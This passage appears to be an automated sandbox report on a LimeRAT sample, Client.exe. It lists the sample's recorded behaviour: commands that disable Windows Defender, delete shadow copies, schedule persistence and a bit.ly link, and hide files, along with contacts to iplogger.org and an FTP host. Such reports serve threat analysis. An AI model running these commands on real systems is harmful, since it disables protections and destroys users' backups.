PID 748 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 748 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 1856 wrote to memory of 4392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1856 wrote to memory of 4392 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2232 wrote to memory of 1144 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2232 wrote to memory of 1144 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4444 wrote to memory of 988 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4444 wrote to memory of 988 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /sc ONLOGON /RL HIGHEST /tn MapsToastTask /tr "'C:\Users\Admin\AppData\Roaming\Branding\svchost.exe'"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "09:16" /sc daily /mo "1" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "11:06" /sc daily /mo "4" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "18:41" /sc daily /mo "1" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "22:43" /sc weekly /mo "2" /d "Fri" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "12:18" /sc monthly /m "feb" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 113.132.67.172.in-addr.arpa udp
US 8.8.8.8:53 ftp.encompossoftware.com udp
US 64.40.144.30:21 ftp.encompossoftware.com tcp
US 8.8.8.8:53 30.144.40.64.in-addr.arpa udp
US 64.40.144.30:34255 ftp.encompossoftware.com tcp

Files

memory/748-0-0x00007FF983743000-0x00007FF983744000-memory.dmp

memory/748-1-0x000002A481F60000-0x000002A481FA2000-memory.dmp

memory/748-7-0x00007FF983740000-0x00007FF98412C000-memory.dmp

memory/2880-12-0x00000216696C0000-0x00000216696E2000-memory.dmp

memory/2880-15-0x0000021669870000-0x00000216698E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ytgigfw1.u5h.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fb75f30f942ccc591174828552106c25
SHA1 3f487ec629fc80a2c2c3819e1cce71deef091559
SHA256 887721eb760a125f1e7d205261112791a664f6e9d763d0aafc36d7f8aed45647
SHA512 b0877cbc359b34fd90177136b347bdb423ff122082cd2c9d6146b259c01d9f3377b850891b2874b00be2e1058f3e58cb0f1d5d5de78b6de85744289c2d5937b0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 929e860c5b7e9cec83a622fcfd0349d2
SHA1 5052a3fad6546b26d8536ec3377e31946e0acb35
SHA256 55b4ad31d2cc299e1819512d4e86d39978b67fb711ef10d909746a6ed8783bbf
SHA512 2ae18278dc567f141f260d962aabe9dba46a2259bef2fd9c3c29549950ec87fd68adf37acb71acb6ece1d9503dc60733656988e640a0a6873becf6c61fe81244

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1352fb08cf60b98b878c7339aca43d55
SHA1 e142a79632f2a9af8c0b08234ee6546044242cc6
SHA256 ea38a095204163e757e1651ba91e12a838596439133f5fe10ec25bc62835cd87
SHA512 77ebdd62a59e27894bd91d1a7a0e8b84d5936504396f1b20ff745353f9dbea94b7b07aab8dadfdf15a73c56292533bd54f643a73525e2fb65ab4f44fb4d3ec7e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1e41198beccc226d287d0ee1f54459aa
SHA1 aedca1b8ec4180dba03a7ddc6ef12d8254d393f0
SHA256 a3d82d38511e2cfead13bb895b33f8e2a1d28d1248825defcaa6058e6e20c1e3
SHA512 c06bbf5d4568e312c204b05b47445deb2e5dae10661b9da6f5054e27d60336f45bbb6d498e968902f1aa3f3559a334dea70343b51b3c2fc7420495ee5dae4d42

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9dbc55570c6a0dd9d7dd07f6db15991e
SHA1 7eb6e41b96934c3f927290a90f650b0f3eaa8b5f
SHA256 28e747a21ceac52911a7a2ded7c8243e2cb55b28e2e93dbc526dc7233a06f81d
SHA512 da2fc8028fec4c9ce924a317e897facad41ce46bda3eb4454c8bb3c55dca88f7f01466b97d397ab9697e69bc30723b2eefdeff95c9e1547577cc81d7935ad55f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c54cce23e8e92aa511003c412c5f5089
SHA1 ba63e56ba1da2472d18b050b50c3bce52afe0958
SHA256 39b2d1a1fdab056182c372f81998cdc237fe52f9de59dc5bc000512be8434038
SHA512 8008682103b5f6011aa78f149a9e4c369d407165f3fcc304b4081894640be878d3729bd593ee99cfb090b66c5f937147cd7ef0f0c5d6d40cf8705f94ab9ecf44

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d1c31a5761a4e179f2f9ca05c69648ea
SHA1 9014edbc18cdaeae68ebaea1b7d43efc0a303b6f
SHA256 fb2ddd3a2a48093c7e8c36ecd960510bf9e1ab93ad9798495d9ed2bdc1c7d412
SHA512 65808f5d2c0b0fe99606f944f548392aeb4d3a4d848922f9e69f5fc86c8bd9d06ad00bf4df0d70e0f13426e64e25843b6f75ee61384e3971a60ec7ad6bfc4e4e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5320782f355d9abf2bbbc49819f5917a
SHA1 fea469b76ab94258b25bea3887fc11efe80b40b8
SHA256 10fb0a7d8875c8b3f5ee6ca5143de06832bc572164b4e250f922dc93d302f8b8
SHA512 c1d6ad13f1bb54e72576d82f59ea293ada4145a5bf9dc17c35d38d5c2fca5b114270dc61277e69b0f2c3e7f3cf70de4dbc3e7be3f0551b0b0da5c3b08bebdee3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5d1b688b15490bbab32b1c290c149c18
SHA1 1b9f28710e8e18adf2835aac22df830443ea882f
SHA256 203a1b2e0374cae759867a6039a808bb94f16ab80fce5534a6dd6c00ff49fc18
SHA512 6f5dc73ee402e5653e96e0763bbfdeb930c95c29a17dde0a036a20771dbe367d33a81f12c898c7ad94d81fa95cf645fb53b9e9c5e7ff671af8675f5700da4d1f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\4183903823\2290032291.pri

MD5 b8da5aac926bbaec818b15f56bb5d7f6
SHA1 2b5bf97cd59e82c7ea96c31cf9998fbbf4884dc5
SHA256 5be5216ae1d0aed64986299528f4d4fe629067d5f4097b8e4b9d1c6bcf4f3086
SHA512 c39a28d58fb03f4f491bf9122a86a5cbe7677ec2856cf588f6263fa1f84f9ffc1e21b9bcaa60d290356f9018fb84375db532c8b678cf95cc0a2cc6ed8da89436

C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\1601268389\715946058.pri

MD5 30ec43ce86e297c1ee42df6209f5b18f
SHA1 fe0a5ea6566502081cb23b2f0e91a3ab166aeed6
SHA256 8ccddf0c77743a42067782bc7782321330406a752f58fb15fb1cd446e1ef0ee4
SHA512 19e5a7197a92eeef0482142cfe0fb46f16ddfb5bf6d64e372e7258fa6d01cf9a1fac9f7258fd2fd73c0f8a064b8d79b51a1ec6d29bbb9b04cdbd926352388bae

memory/748-547-0x00007FF983743000-0x00007FF983744000-memory.dmp

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

MD5 16deda7a7a2e8f354fbff30ad723a711
SHA1 8730e18a2fc9722f7700c1192b3cc941169d7701
SHA256 4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e
SHA512 6a19f30f3eca499e14ab97c5055420cc352852b9e5caeeaf016cd6c707dee6837b92bd7a49e7ca288e391205f3ae0786f43a4fef1ca01e5829594edfe60108cd

memory/748-553-0x00007FF983740000-0x00007FF98412C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-19 22:06

Reported

2024-06-19 22:07

Platform

win10v2004-20240508-en

Max time kernel

45s

Max time network

44s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Enumerates physical storage devices

Disables Windows logging functionality

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5056 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 4384 wrote to memory of 3964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4384 wrote to memory of 3964 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4384 wrote to memory of 1276 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4384 wrote to memory of 1276 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 5056 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5056 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5056 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 5056 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
